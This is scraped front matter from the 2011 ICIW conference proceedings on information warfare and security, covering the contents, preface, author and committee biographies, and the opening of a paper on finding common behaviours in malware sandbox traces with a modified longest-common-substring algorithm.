6th European Conference - Academic Conferences
6th European Conference - Academic Conferences
6th European Conference - Academic Conferences
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
The Proceedings<br />
of the<br />
<strong>6th</strong> International<br />
<strong>Conference</strong> on Information<br />
Warfare and Security<br />
The George Washington University,<br />
Washington, DC, USA<br />
17-18 March 2011<br />
Edited by<br />
Leigh Armistead<br />
Edith Cowan University<br />
Programme Chair
Copyright The Authors, 2011. All Rights Reserved.<br />
No reproduction, copy or transmission may be made without written permission from the individual authors.<br />
Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper<br />
abstracts were read and selected by the conference panel for submission as possible papers for the<br />
conference.<br />
Many thanks to the reviewers who helped ensure the quality of the full papers.<br />
These <strong>Conference</strong> Proceedings have been submitted to Thomson ISI for indexing.<br />
Further copies of this book and previous year’s proceedings can be purchased from http://academicconferences.org/2-proceedings.htm<br />
ISBN:97-1-906638-92-4 Book<br />
Published by <strong>Academic</strong> Publishing International Limited<br />
Reading<br />
UK<br />
44-118-972-4148<br />
www.academic-publishing.org
Contents<br />
Paper Title Author(s) Page<br />
No.<br />
Preface iii<br />
Biographies of <strong>Conference</strong> Chairs,<br />
Programme Chair, Keynote Speaker and<br />
Mini-track Chairs<br />
Biographies of contributing authors v<br />
Using the Longest Common Substring on<br />
Dynamic Traces of Malware to Automatically<br />
Identify Common Behaviors<br />
Modeling and Justification of the Store and<br />
Forward Protocol: Covert Channel Analysis<br />
The Evolution of Information Assurance (IA)<br />
and Information Operations (IO) Contracts<br />
across the DoD: Growth Opportunities for<br />
<strong>Academic</strong> Research – an Update<br />
The Uses and Limits of Game Theory in<br />
Conceptualizing Cyberwarfare<br />
Jaime Acosta 1<br />
Hind Al Falasi and Liren Zhang 8<br />
Edwin Leigh Armistead and Thomas Murphy 14<br />
Merritt Baer 23<br />
Who Needs a Botnet if you Have Google? Ivan Burke and Renier van Heerden 32<br />
Mission Resilience in Cloud Computing: A<br />
Biologically Inspired Approach<br />
Link Analysis and Link Visualization of<br />
Malicious Websites<br />
The Strategies for Critical Cyber<br />
Infrastructure (CCI) Protection by Enhancing<br />
Software Assurance<br />
Building an Improved Taxonomy for IA<br />
Education Resources in PRISM<br />
Using Dynamic Addressing for a Moving<br />
Target Defense<br />
Changing the Face of Cyber Warfare with<br />
International Cyber Defense Collaboration<br />
Cyber Strategy and the Law of Armed<br />
Conflict<br />
eGovernance and Strategic Information<br />
Warfare – non Military Approach<br />
Intelligence-Driven Computer Network<br />
Defense Informed by Analysis of Adversary<br />
Campaigns and Intrusion Kill Chains<br />
The Hidden Grand Narrative of Western<br />
Military Policy: A Linguistic Analysis of<br />
American Strategic Communication<br />
Host-Based Data Exfiltration Detection via<br />
System Call Sequences<br />
Detection of YASS Using Calibration by<br />
Motion Estimation<br />
Marco Carvalho, Dipankar Dasgupta, Michael<br />
Grimaila and Carlos Perez<br />
Manoj Cherukuri and Srinivas Mukkamala 52<br />
Mecealus Cronkrite, John Szydlik and Joon Park 68<br />
Vincent Garramone, Daniel Likarish 76<br />
Stephen Groat, Matthew Dunlop, Randy Marchany<br />
and Joseph Tront<br />
Marthie Grobler, Joey Jansen van Vuuren and<br />
Jannie Zaaiman,<br />
Ulf Haeussler 99<br />
Karim Hamza and Van Dalen 106<br />
Eric Hutchins, Michael Cloppert and Rohan Amin 113<br />
Saara Jantunen and Aki-Mauri Huhtinen 126<br />
Brian Jewell and Justin Beaver 134<br />
Kesav Kancherla and Srinivas Mukkamala 143<br />
i<br />
iv<br />
42<br />
84<br />
92
Paper Title Author(s) Page<br />
No.<br />
Developing a Knowledge System for<br />
Information Operations<br />
CAESMA – An On-Going Proposal of a<br />
Network Forensic Model for VoIP traffic<br />
Secure Proactive Recovery – a Hardware<br />
Based Mission Assurance Scheme<br />
Identifying Cyber Espionage: Towards a<br />
Synthesis Approach<br />
Security Analysis of Webservers of<br />
Prominent Organizations in Pakistan<br />
International Legal Issues and Approaches<br />
Regarding Information Warfare<br />
International Legal Issues and Approaches<br />
Regarding Information Warfare<br />
Louise Leenen, Ronell Alberts, Katarina Britz,<br />
Aurona Gerber and Thomas Meyer<br />
Jose Mas y Rubi, Christian Del Carpio, Javier<br />
Espinoza, and Oscar Nuñez Mori<br />
Ruchika Mehresh, Shambhu Upadhyaya and Kevin<br />
Kwiat<br />
151<br />
160<br />
171<br />
David Merritt and Barry Mullins 180<br />
Muhammad Naveed 188<br />
Alexandru Nitu 200<br />
Cyberwarfare and Anonymity Christopher Perr 207<br />
Catch Me If You Can: Cyber Anonymity David Rohret and Michael Kraft 213<br />
Neutrality in the Context of Cyberwar Julie Ryan and Daniel Ryan 221<br />
Labelling: Security in Information<br />
Management and Sharing<br />
Information Management Security for Inter-<br />
Organisational Business Processes,<br />
Services and Collaboration<br />
Anatomy of Banking Trojans – Zeus<br />
Crimeware (how Similar are its Variants)<br />
Terrorist use of the Internet: Exploitation and<br />
Support Through ICT Infrastructure<br />
Evolving an Information Security Curriculum:<br />
New Content, Innovative Pedagogy and<br />
Flexible Delivery Formats<br />
Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel<br />
Boonstra<br />
Maria Th. Semmelrock-Picej, Alfred Possegger and<br />
Andreas Stopper<br />
228<br />
238<br />
Madhu Shankarapani and Srinivas Mukkamala 252<br />
Namosha Veerasamy and Marthie Grobler 260<br />
Tanya Zlateva, Virginia Greiman, Lou Chitkushev<br />
and Kip Becker<br />
Research in Progress Papers 277<br />
Towards Persistent Control over Shared<br />
Information in a Collaborative Environment<br />
3D Execution Monitor (3D-EM): Using 3D<br />
Circuits to Detect Hardware Malicious<br />
Inclusions in General Purpose Processors<br />
Towards An Intelligent Software Agent<br />
System As Defense Against Botnets<br />
268<br />
Shada Alsalamah, Alex Gray and Jeremy Hilton 279<br />
Michael Bilzor 289<br />
Evan Dembskey and Elmarie Biermann 299<br />
Theoretical Offensive Cyber Militia Models Rain Ottis 308<br />
Work in Progress 315<br />
Large-scale analysis of continuous data in<br />
cyber-warfare threat detection<br />
A System and Method for Designing Secure<br />
Client-Server Communication Protocols<br />
Based on Certificateless PKI<br />
William Acosta 317<br />
Natarajan Vijayarangan 320<br />
ii
Preface<br />
These Proceedings are the work of researchers contributing to the <strong>6th</strong> International <strong>Conference</strong> on<br />
Information Warfare and Security (ICIW 2011), hosted this year by the George Washington University,<br />
Washington DC, USA. The <strong>Conference</strong> Chair is Dr. Julie Ryan from the George Washington University,<br />
Washington, DC, USA and I am again the Programme Chair.<br />
The opening keynote address this year is given by Matthew A. Stern, General Dynamics Advanced<br />
Information Systems, USA The second day will be opened by Mathew “Pete” Peterson from the Naval<br />
Criminal Investigative Service, USA.<br />
An important benefit of attending this conference is the ability to share ideas and meet the people who hold<br />
them. The range of papers will ensure an interesting and enlightened discussion over the two day schedule.<br />
The topics covered by the papers this year illustrate the depth of the information operations’ research area,<br />
with the subject matter ranging from the highly technical to the more strategic visions of the use and<br />
influence of information.<br />
With an initial submission of 97 abstracts, after the double blind, peer review process there are 38 papers<br />
published in these <strong>Conference</strong> Proceedings, including contributions from Austria, Bangladesh, Estonia,<br />
Finland, India, Iran, Pakistan, Peru, Romania, South Africa, the Netherlands, United Arab Emirates, United<br />
Kingdom and the United States.<br />
I wish you a most enjoyable conference.<br />
March 2011<br />
Leigh Armistead<br />
Edith Cowan University<br />
Programme Chair<br />
iii
Biographies of <strong>Conference</strong> Chairs, Programme Chairs and Keynote<br />
Speakers<br />
<strong>Conference</strong> Chairs<br />
Programme Chairs<br />
Dr. Julie Ryan currently teaches and directs research in Information Assurance at<br />
The George Washington University. Prior to joining academia, she worked in various<br />
positions in industry and government. Her degrees are from the US Air Force<br />
Academy, Eastern Michigan University, and The George Washington University.<br />
Dr Edwin “Leigh” Armistead is the Director of Business Development for Goldbelt<br />
Hawk LLC, the Programme Chair for the International <strong>Conference</strong> of Information<br />
Warfare and an Adjunct Lecturer for Edith Cowen University in Perth, Australia. He<br />
has written nine books, 18 journal articles, presented 17 academic papers and served<br />
as a Chairman for 16 professional and academic conferences. Formerly a Master<br />
Faculty at the Joint Forces Staff College, Leigh received his PhD from Edith Cowan<br />
University with an emphasis on Information Operations. He also serves as a Co-<br />
Editor for the Journal of International Warfare, and the Editorial Review Board for<br />
<strong>European</strong> <strong>Conference</strong> on Information Warfare.<br />
Keynote Speakers<br />
Mathew “Pete” Peterson has served in a variety of positions within US government<br />
agencies since 1989, to include 13 years on active duty in the U.S. Army. He has<br />
experience in a wide range of domains, including information assurance/information<br />
protection, research, development & acquisition (RDA)/research & technology<br />
protection (RTP), cyber analysis issues, critical infrastructure protection, and threat<br />
analysis. He currently serves as Cyber Analysis Division Chief within the Naval<br />
Criminal Investigative Service, while working towards completion of his dissertation in<br />
the Executive Leadership Doctoral Program at George Washington University’s Virginia<br />
Campus.<br />
Matthew Stern is the director of cyber accounts for General Dynamics Advanced Information Systems. He<br />
also provides subject matter expertise in cyber space operations to the company and its customers. Stern<br />
also represents the company on several boards and advisory groups providing thought leadership to the<br />
cyber security community. He spent 22 years in positions of increasing responsibility in the U.S. Army<br />
culminating with command of 2nd Battalion, 1st Information Operations Command and the Army Computer<br />
Emergency Response Team (ACERT). This is the first unit in U.S. Army history dedicated to cyberspace<br />
operations. Stern is an established expert on information technology, network security, information<br />
operations and special information operations. He is also a recognized visionary regarding the military<br />
conduct of cyberspace operations. He has developed his knowledge and expertise through practical<br />
experience leading his command, the U.S. military data communication services in Iraq, support to the<br />
technical architecture of the U.S. Army’s digitized Armored Corps, and the systems integration for the Land<br />
Information Warfare Activity Information Dominance Center. Stern is also a decorated combat veteran of<br />
Operations DESERT SHIELD /STORM and IRAQI FREEDOM. Matt holds a Masters degree in Information<br />
Systems and Computer Resource Management from Webster University and a Bachelor’s of Science degree<br />
in Political Science from Northern Illinois University.<br />
iv
Biographies of contributing authors (in alphabetical order)<br />
Jaime Acosta completed his Ph.D. in Computer Science at the University of Texas at El Paso. Dr. Acosta’s<br />
research has received awards and recognition including the outstanding dissertation award by the University<br />
of Texas at El Paso. Jaime is currently working at the United States Army Research Laboratory conducting<br />
security research.<br />
William Acosta, Ph.D. received his Ph.D. from the University of Notre Dame in 2008 and is currently an<br />
assistant professor at the University of Toledo teaching in the Computer Science and Engineering<br />
Technology Program. His prior work included peer-to-peer search and distributed systems. He is currently<br />
working on experimental data systems research focusing on large-scale data analysis.<br />
Hind Al Falasi, is currently pursuing a PhD in Information Security at the United Arab Emirates University, Al<br />
Ain, UAE. He received a Bachelors of Science in Information Security from the United Arab Emirates<br />
University. Where the main focus is Security of Vehicular Ad hoc Networks.<br />
Rohan Amin is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />
with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />
ranged from deeply technical to broadly organizational.<br />
Shada Al-Salamah is a doctoral candidate at the Department of Computer Science & Informatics, Cardiff<br />
University, UK. She received her MSc in Strategic Information Systems with Information Assurance from<br />
Cardiff University and received a BSc in Information Technology from the College of Computer and<br />
Information Sciences, King Saud University, Riyadh, Saudi Arabia.<br />
Merritt Baer is a graduate of Harvard Law School and Harvard College. She has conducted clinical cyberlaw<br />
research at Harvard's Berkman Center for Internet and Society and has published a number of pieces at the<br />
intersection of cybercrime, Constitutional Internet issues and national security. She currently serves as a<br />
judicial clerk at the United States Court of Appeals for the Armed Forces.<br />
Michael Bilzor is a PhD student at the Naval Postgraduate School. He has a B.S. in Computer Science from<br />
the U.S. Naval Academy and an M.S. in Computer Science from Johns Hopkins University. He served in F-<br />
14 and F/A-18 squadrons as a Naval Flight Officer until 2005. His research interest is in hardware security.<br />
Ivan Burke is a Msc student in the department of Computer Science at the University of Pretoria, South<br />
Africa. He also works full time at the Council of Scientific and Industrial Research South Africa in the<br />
department of Defense Peace Safety and Security,where he works within the Command, Control and<br />
Information Warfare research group.<br />
Marco Carvalho is a research Scientist at Florida Institute for Human and Machine Cognition (IHMC). He<br />
received his Ph.D. from Tulane University, New Orleans, following a M.Sc. in Computer Science from<br />
University of West Florida, a M.Sc. in Mechanical Engineering from Federal University of Brasilia (UnB), and<br />
a B.Sc. in Mechanical Engineering, also from UnB. His research interests are primarily in the areas of<br />
biologically inspired security and tactical networks.<br />
Mecealus Cronkrite is studying for a M.S in Information & Security Management at Syracuse University,<br />
School of Information Studies, He is a DHS Career Development Grant fellow, Graduate Engineering<br />
Minority (GEM) fellow. He gained a B.S degree in 2009 in Computer Science, from the State University at<br />
Brockport NY. He has spent 7 years in industry in systems integration programing and analysis, and IT<br />
disaster management roles.<br />
Mike Cloppert is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />
with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />
ranged from deeply technical to broadly organizational.<br />
Evan Dembskey is a senior lecturer at UNISA in Pretoria, South Africa. He currently lectures in the area of<br />
computer security. His research interests include IW and technology and science in Ancient Greece and<br />
Rome.<br />
Javier Espinoza was born in Lima, Peru, on August, 1971. He studied Electronic Engineering in Pontificia<br />
Universidad Catolica del Peru. He studied specialization in Cisco Certified Network Associate (CCNA), in<br />
v
Structured Wiring and Information System Security. Javier is studying a Telecommunications Engineering<br />
master at Pontificia Universidad Catolica del Peru in Lima, Peru<br />
Stephen Groat is a PhD student at Virginia Tech in the Bradley Department of Electrical and Computer<br />
Engineering focusing on network security and IPv6. Working in coordination with the Information Technology<br />
Security Office and Lab, Stephen is researching the security implications of IPv6.<br />
Ulf Haeussler is a Legal Advisor in the German Armed Forces and currently seconded to HQ SACT. Prior<br />
to this assignment, Ulf served in multiple German Armed Forces positions as well as at NATO HQ, and was<br />
deployed to NATO operations as a reservist on active duty. Ulf is widely published on international law.<br />
Karim Hamza works as an <strong>Academic</strong> Researcher at the Maastricht school of Management (Netherlands),<br />
Part Time Professor at the American University (Egypt) and Approved Tutor for Edinburgh Business School<br />
(UK). Additionally, he works as a Business Development Manager in one of the leading information<br />
technology companies specialized in Enterprise Resource Planning applications for governments and private<br />
sectors.<br />
Tim Hartog graduated in 2005 at the Technical University of Twente, in the Netherlands. Since then he has<br />
been active in the field of Information Security. During his work at TNO, the Dutch Organization for Applied<br />
Scientific Research, Tim has been working in the areas of Trusted Computing, Trusted Operating Systems<br />
and Cross Domain Solutions.<br />
Saara Jantunen studies leadership as a doctoral student in the Finnish Defence University. She has studied<br />
English language and culture at the University of Groningen in the Netherlands and English philology in the<br />
University of Helsinki, Finland. Her research interests include language & identity and military discourse.<br />
Jantunen currently works in education.<br />
Brian Jewell is a graduate student with an emphasis on Information Security at Tennessee Technological<br />
University. He received his B.S. in Computer Science from Murray State University. During summer 2010 he<br />
interned at Oak Ridge National Laboratory in the Applied Software Engineering Research group. His<br />
research is in the area of host intrusion detection and response.<br />
Louise Leenen is a Senior Researcher at the South African Council for Scientific and Industrial Research in<br />
the Defence, Peace, Safety and Security (DPSS) unit which focuses on defence related research and<br />
development. She holds a PhD in Computer Science from the University of Wollongong in Australia.<br />
Dan Likarish is a Director of the Center on Information Assurance Studies and faculty at Regis University<br />
School of Information and Computer Science. For many years he has been the advisor for undergraduate<br />
and graduate students with an interest in IS and IT problems. His research interests are in rapid curriculum<br />
development and deployment in conjunction with virtual worlds.<br />
Jose Luis Mas y Rubi studied Systems Engineering at the Instituto Universitario Politecnico Santiago<br />
Mariño in Barcelona, Venezuela. He has a Cisco CCNA certification in networking. He is currently studying<br />
for a Telecommunications Engineering Master degree at Pontificia Universidad Catolica del Peru in Lima,<br />
Peru.<br />
Ruchika Mehresh is a doctoral student of Computer Science and Engineering at the State University of New<br />
York at Buffalo. Her research focuses on reliability and security in fault-tolerant computing. She has worked<br />
on research projects funded by U.S. Air Force Research Laboratory<br />
David Merritt received his B.S. in computer engineering from the U.S. Air Force Academy. He is an<br />
Undergraduate Network Warfare Training graduate, holds CISSP and GSEC certifications, and spent 3 years<br />
on the Air Force Computer Emergency Response Team. David is an active duty officer attending the Air<br />
Force Institute of Technology in Ohio.<br />
Srinivas Mukkamala is a senior research scientist with ICASA (Institute for Complex Additive Systems<br />
Analysis), Adjunct Faculty of Computer Science Department of New Mexico Tech, advisor Cyber Security<br />
Works, and co-founder/managing partner of CAaNES LLC. He received his Ph.D. from New Mexico Tech in<br />
2005. He is a frequent speaker on information assurance in conferences and tutorials across the world.<br />
Muhammad Naveed completed B.Sc degree in Electrical Engineering (with majors in communication),<br />
University of Engineering and Technology (UET), Peshawar, Pakistan 2010. Currently a lecturer at<br />
vi
Department of Computer Science, IQRA University, Peshawar, Pakistan. Research interests include<br />
information security and cryptography.<br />
Alexandru Nitu is a legal counselor at the Romanian Intelligence Service, with nine years of experience in<br />
matters regarding human rights protection. He is involved in legal studies referring to the impact of the<br />
intelligence activities on respecting citizens’ fundamental rights and liberties.<br />
Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He is a graduate of the<br />
United States Military Academy and Tallinn University of Technology (MSc, Informatics). He continues his<br />
studies at a PhD program in Tallinn University of Technology, where he focuses on politically motivated<br />
cyber attack campaigns by non-state actors.<br />
Christopher Perr is currently a PhD candidate at Auburn University studying computer and network security.<br />
He holds a B.S. in Computer Science from the Air Force Academy and a Masters of Software Engineering<br />
from Auburn University.<br />
David Rohret, CSC, Inc. Joint Information Operations Warfare Center (JIOWC). For over fifteen years he<br />
has pursued network security interests to include developing and vetting exploits for use on established red<br />
teams and adversarial research. He holds degrees in Computer Science from the University of Iowa and La<br />
Salle University.<br />
Shambhu Upadhyaya is Professor of Computer Science and Engineering at the State University of New<br />
York at Buffalo. His research interests are computer security, information assurance, fault-tolerant<br />
computing, distributed systems and reliability. His research has been funded by federal agencies such as<br />
National Science Foundation, U.S. Air Force Research Laboratory, DARPA, National Security Agency and<br />
industries such as IBM, Intel, Cisco and Harris Corporation.<br />
Namosha Veerasamy obtained a BSc:IT Computer Science Degree, and both a BSc: Computer Science<br />
(Honours Degree) and MSc: Computer Science with distinction from the University of Pretoria. She is<br />
currently employed as a researcher at the Council for Scientific and Industrial Research (CSIR) in Pretoria.<br />
Namosha is also qualified as a Certified Information System Security Professional (CISSP).<br />
Natarajan Vijayarangan is a senior scientist in TCS. He obtained his Ph.D in Mathematics in 2001 from<br />
RIASM, University of Madras. He received 'Best Research Paper Award' of Ramanujan Mathematical<br />
Society in 2000. He has published patents, papers and books in the field of Information Security. He has<br />
participated in NIST SHA-3 competition and received 'AIP Anchor Award'.<br />
Jannie Zaaiman (B Comm, B Proc, HBA, MBA, PhD) is Deputy Vice Chancellor: Operations at the<br />
University of Venda, and is the former Executive Dean, Faculty of Information and Communication<br />
Technology at the Tshwane University of Technology (TUT). Before joining TUT, Jannie was Group<br />
Company Secretary of Sasol, Managing Executive: Outsourcing and Divestitures at Telkom and Group<br />
Manager at Development Bank of Southern Africa.<br />
Tanya Zlateva completed her doctorate at the Dresden University of Technology, Germany, and<br />
postdoctoral training at the Harvard-MIT Division for Health Sciences and Technology. Her research interests<br />
include application level security, biometrics, and new educational technologies. She currently serves as<br />
director of Boston University's Center for Reliable Information Systems and Cyber Security.<br />
vii
<strong>Conference</strong> Executive:<br />
Michael Grimaila, Center for Cyberspace Research, WPAFB, Ohio, USA<br />
Dorothy Denning, Naval Postgraduate School, Monterey, CA, USA<br />
Doug Webster, MITRE Corporation - United States Strategic Command's Global Innovation & Strategy<br />
Center<br />
Kevin Streff, Dakota State University, USA<br />
Andy Jones, Security Research Centre, British Telecom, UK and Khalifa University, UAE<br />
William Mahoney University of Nebraska Omaha, Omaha, USA<br />
Dan Kuehl, National Defense University, Washington DC, UK,<br />
Corey Schou, Idaho State University, USA<br />
Committee Members:<br />
The conference programme committee consists of key people in the information systems, information<br />
warfare and information security communities around the world. The following people have confirmed their<br />
participation:<br />
Jim Alves-Voss (University of Idaho, USA); Todd Andel (Air Force Insitute of Technology, USA); Leigh<br />
Armistead (Edith Cowan University, Australia); Johnnes Arreymbi (University of East London, UK); Rusty<br />
Baldwin (Air Force Insitute of Technology, USA); Richard Baskerville (Georgia State University, USA); Allan<br />
Berg (Critical Infrastructure and Cyber Protection Center, Capitol College, USA); Sviatoslav Braynov<br />
(University of Illinois, USA); Blaine Burnham (University of Nebraska, Omaha, USA); Catharina Candolin<br />
(Finnish Defence Forces, Helsinki, Finland); Rodney Clare (EDS and the Open University, UK); Nathan<br />
Clarke (University of Plymouth, UK); Geoffrey Darnton, (University of Bournemouth, UK); Dipankar Dasgupta<br />
(Intelligent Security Systems, USA); Dorothy Denning (Navel Postgraduate School, USA); Glenn Dietrich<br />
(University of Texas, USA); David Fahrenkrug (US Air Force, USA); Kevin Gleason (KMG Consulting, MA,<br />
USA); Sanjay Goel (University at Albany, USA); Michael Grimaila (Air force Institute of Technology, Ohio,<br />
USA); Daniel Grosu (Wayne State University, USA); Drew Hamilton (Auburn University, USA); Dwight<br />
Haworth (University of Nebraska at Omaha, USA); Philip Hippensteel (Penn State University, USA); Jeffrey<br />
Humphries (Air Force Institute of Technology, USA); Bill Hutchinson (Edith Cowan University, Australia);<br />
Berg P Hyacinthe (Assas School of Law, Universite Paris, France); Andy Jones (British Telecom, UK);<br />
James Joshi (University of Pittsburgh, USA); Leonard Kabeya Mukeba (Kigali Institute of Science and<br />
Technology, Rwanda); Prashant Krishnamurthy (University of Pittsburgh, USA); Dan Kuehl (National<br />
Defense Forces, USA); Stuart Kurkowski (Airforce Institute of Technology, USA); Takakazu Kurokawa<br />
(National Defense Acadamy, Japan); Rauno Kuusisto (National Defence College, Finland); Tuija Kuusisto<br />
(Internal Security ICT Agency, Finland); Arun Lakhotia (University of Louisiana Lafayette, USA); Sam Liles<br />
(Purdue University Calumet, USA): Cherie Long (Clayton State University, Decatur, USA); Brian Lopez<br />
(Lawrence Livermore National Laboratory); Juan Lopez (Air Force Institute of Technology, USA); Bin Lu<br />
(West Chester University, USA); Bill Mahoney (University of Nebraska, USA); John McCarthy<br />
(Buckinghamshire and Chiltern University College, UK); J Todd McDonald (Airforce Institute of Technology,<br />
USA); Robert Mills (Air Force Institute of Technology, Ohio, USA); Don Milne (Buckinghamshire and Chiltern<br />
University College, UK); Srinivas Mukkamala (New Mexico Tech, Socorro, USA); Barry Mullins (Air Force<br />
Institute of Technology, USA); Andrea Perego (Università degli Studi dell’Insubria, Italy); Gilbert Patterson<br />
(Air Force Institute of Technology, USA): Richard Raines (Airforce Institute of Technology, USA); Ken Revett<br />
(University of Westminster, UK); Neil Rowe (US Naval Postgraduate School, USA); Julie Ryan (George<br />
Washington University, USA); Corey Schou (Idaho State University, USA); Dan Shoemaker (Univesity of<br />
Detroit Mercy, USA); William Sousan (University of Nebraska, Omaha, USA); Kevin Streff (Dakota State<br />
University, USA); Dennis Strouble (Air Force Institute of Technology, USA); Eric Trias (Air Force Institute of<br />
Technology, USA); Doug Twitchell (Illinois State University, USA); Renier van Heerden (CSIR, Pretoria,<br />
South Africa); Stylianos Vidalis (Newport Business School, UK); Fahad Waseem (Unviersity of Northumbria,<br />
UK); Kenneth Webb, Edith Cowan University, Australia); Douglas Webster (USSTRATCOM Global<br />
Innovation & Strategy Center, USA); Zehai Zhou (Dakota State University, USA).<br />
viii
Using the Longest Common Substring on Dynamic Traces<br />
of Malware to Automatically Identify Common Behaviors<br />
Jaime Acosta<br />
Army Research Laboratory, White Sands, NM, USA<br />
jaime.acosta1@us.army.mil<br />
Abstract: A large amount of research is focused on identifying malware. Once identified, the behavior of the<br />
malware must be analyzed to determine its effects on a system. This can be done by tracing through a malware<br />
binary using a disassembler or logging its dynamic behavior using a sandbox (virtual machines that execute a<br />
binary and log all dynamic events such as network, registry, and file manipulations). However, even with these<br />
tools, analyzing malware behavior is very time consuming for an analyst. In order to alleviate this, recent work<br />
has identified methods to categorize malware into “clusters” or types based on common dynamic behavior. This<br />
allows a human analyst to look at only a fraction of malware instances–those most dissimilar. Still missing are<br />
techniques that identify similar behaviors among malware of different types. Also missing is a way to<br />
automatically identify differences among same-type malware instances to determine whether the differences are<br />
benign or are the key malicious behavior. The research presented here shows that a wide collection of malware<br />
instances have common dynamic behavior regardless of their type. This is a first step toward enabling an analyst<br />
to more efficiently identify malware instances’ effects on systems by reducing the need for redundant analysis<br />
and allowing filtration of common benign behavior. This research uses the publicly available Reference Data Set<br />
that was collected over a period of three years. Malware instances were identified and assigned a type by six<br />
anti-malware scanners. The dataset consists of dynamic trace events of 3131 malware instances generated by<br />
CWSandbox. For this research, the dataset is separated into two sets: small and large. The small set contains<br />
2071 instances of malware that are less than 100 KB in size. The large set contains 1060 instances of malware<br />
that are between 100 KB and 3.4 MB in size. In order to measure the common behavior between the small and<br />
large sets, common sequential event sequences within each malware instance in the small set are identified<br />
using a modified version of the longest common substring algorithm. Once identified, all appearances of these<br />
common event sequences are removed from the large set to determine shared behavior. Most common<br />
sequences are between length 2 and 60 events. Results indicate that when using length 2 event sequences and<br />
higher, on average, the large set instances share 96% of event sequences, with length 6 and higher event<br />
sequences–66%, and with length 12 and higher event sequences–50%. This indicates that an analyst’s workload<br />
can be largely reduced by removing common behavior sequences. Furthermore, it shows that malware instances<br />
may not always fall into exclusive categories. It may be more beneficial to instead identify behaviors and map<br />
them to malware instances, for example, as with the Malware Attribute Enumeration and Characterization<br />
(MAEC). Future efforts may look into attaching semantic labels on long sequences that are common to many<br />
malware instances in order to aid the analyst further.<br />
Keywords: malware, similarity, dynamic, analysis, substring<br />
1. Introduction<br />
As the number of malware instances grows each year, there is a need for automated methods that<br />
can efficiently identify, classify, and reduce the amount of data that an analyst has to review pertaining<br />
to malware. This paper focuses on identifying similarities among known malware instances in order to<br />
reduce an analyst’s workload.<br />
Automatic malware detection has been researched extensively in the past (Vinod et al., 2009). When<br />
malware is identified, it is assigned a type or name. The malware binary behavior is analyzed in detail<br />
in order to provide alerts, recover data, and assess damage among others. Recently, there have been<br />
two main approaches to accomplish this: static and dynamic analysis. In static analysis, the malware<br />
binary is reverse engineered using a disassembler. This method can be very time consuming,<br />
especially due to obfuscation techniques such as polymorphism (Kasina et al., 2010), metamorphism<br />
(Lee et al., 2010), memory packing (Han et al., 2010), and virtualization (Sharif et al., 2009). Dynamic<br />
analysis, on the other hand involves running the malware binary in a controlled environment known as<br />
a sandbox, e.g., Norman (Norman Solutions, 2003), Anubis (Bayer et al., 2006), CWSandbox<br />
(Willems et al., 2007), where every event during the malware’s execution is logged to an event trace.<br />
State-of-the-art sandboxes have the ability to fast-forward time to elicit delayed malware execution<br />
and can even simulate user interaction. Current techniques, e.g., (Rieck et al., 2010), use clustering<br />
methods in order to group similar malware based on their events during runtime, but still require<br />
manual analysis to identify specific similarities and differences.<br />
1
Jaime Acosta<br />
The research presented here uses a dataset that consists of sandbox event traces of 3131 malware<br />
instances. Manual observation of the dataset revealed many behavior patterns that were shared<br />
across many instances such as file replacements (which involve a series of system calls), that at first<br />
glance seem complex and overwhelming, but were made simple by replacing these common<br />
behaviors with short annotations. This paper is a step in automating this process.<br />
The following are the contributions resulting from the work described in this paper.<br />
This research provides a methodology shows how the longest common substring algorithm can<br />
be modified to conduct similarity analysis on malware using dynamic event traces. This similarity<br />
may be due to code reuse, which arises from legitimate third-party libraries and also by reusing<br />
infected or malicious code.<br />
Use of this algorithm shows that in this dataset of malware, even though the instances are of<br />
different types (assigned by anti-virus programs), there are a large number of common behaviors.<br />
This means that it is the case that malware authors reuse code, and that an analyst could use this<br />
to eliminate duplicate processing.<br />
This research shows that the common behaviors identified are not limited to short trivial event<br />
sequences; there are many large sequences. This indicates that it may be possible to replace<br />
semantically rich events with natural language annotations to facilitate analysis.<br />
2. Related work<br />
Because of the large growth of malware instances being introduced each year, there has been a large<br />
amount of work to aid in each stage of the malware analysis workflow.<br />
The first step in analysis is data collection. Tools that aid in this collection include Nepenthes<br />
(Baecher et al., 2006), Amun (Göbel, 2009), and HoneyPots (Provos, 2004). After collection, the<br />
malware instances are analyzed using static (source code) or dynamic (event traces) techniques. In<br />
the past decade there have been a wide variety of techniques used for static and dynamic analysis of<br />
legitimate source code, with the goal of exploiting program semantics in an efficient way (Cornelissen,<br />
2009). Related to malware, there have been many techniques that exploit characteristics unique to<br />
malware, including malicious behavior, small program size, and code reuse among instances.<br />
In both static and dynamic analysis techniques, one method that has had recent attention is using<br />
machine learning to cluster similar malware instances. Clustering methods are useful because they<br />
generalize large sets of malware into categories with limited need for manual human intervention.<br />
Jang and Brumley (2009) perform static analysis by identifying areas of code reuse by clustering<br />
malware binaries. His clustering method uses bloom filters, which identify similarity of malware<br />
instances by applying hashing techniques to fixed size chunks of the malware executable code.<br />
On the other hand, Bayer et al. (2009) use machine learning algorithms to identify similarities in<br />
malware instances by comparing their dynamic event traces, which include system calls, their<br />
dependencies, and network behavior. Next, the malware instances are clustered based on their<br />
dynamic behavior. A limitation of this approach is that the algorithm is trained with a fixed set of<br />
malware. It does not allow retraining with additional malware samples during the clustering phase.<br />
Rieck extends this with his Malheur (Rieck et al., 2010) system by establishing an iterative<br />
mechanism that consists of clustering and then classifying new instances into existing clusters. In his<br />
work, similarity is determined by the presence of shared fixed-length instruction sequences. In<br />
addition, Rieck also uses a dynamic trace representation format called MIST (Trinius et al., 2010) that<br />
allows prioritization of event parameters (e.g., an openfile system call may have the file name, file<br />
type, and the file path as parameters). This is meant to allow more efficient processing for machine<br />
learning algorithms by reducing the input file size by leaving out less-critical parameters. MIST also<br />
provides a common file format to which many of the available sandbox output can be converted.<br />
After the instances are clustered, an analyst may have to conduct deeper investigation, such as exact<br />
differences and similarities in the binaries. It may be the case that malware in different clusters share<br />
common behaviors. This results in redundant analysis by a human analyst. Another issue is that<br />
instances in a cluster are not exactly the same. There may be malicious behavior that is unique to one<br />
instance within a cluster. One way to alleviate these issues is to, instead of determining similarity by<br />
